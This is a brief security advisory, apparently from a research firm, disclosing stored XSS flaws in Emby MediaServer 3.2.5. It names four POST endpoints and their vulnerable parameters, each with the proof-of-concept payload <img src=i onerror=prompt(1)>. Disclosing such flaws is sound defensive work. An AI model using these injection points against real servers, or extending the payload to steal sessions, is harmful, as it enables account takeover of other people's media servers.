New vulnerability uncovered
Another breach found by our research lab, on the emby MediaServer 3.2.5 (Stored XSS) Exploit Title : Emby MediaServer 3.2.5 - Stored XSS Google Dork : - Date : 28/05/2017 Type : webapps Platform: PHP Vendor Homepage : http://emby.media -------------------------------- Type: Stored XSS Vulnerable URL: http://localhost:8096/emby/Users/[userid] Method: Post Vulnerable Parameters : Name Payload:<img src=i onerror=prompt(1)> ------------------------------- Type: Stored XSS Vulnerable URL: http://localhost:8096/emby/System/Configuration Method: Post Vulnerable Parameters : ServerName Payload:<img src=i onerror=prompt(1)> ------------------------------- Type: Stored XSS Vulnerable URL: http://localhost:8096/emby/Library/VirtualFolders/Paths/Update Method: Post Vulnerable Parameters : NetworkPath Payload:<img src=i onerror=prompt(1)> ------------------------------- Type: Stored XSS Vulnerable URL: http://localhost:8096/emby/Items/[] Method: Post Vulnerable Parameters : Name Payload:<img src=i onerror=prompt(1)> -------------------------------
© Copyright Silent Breach. All Rights Reserved.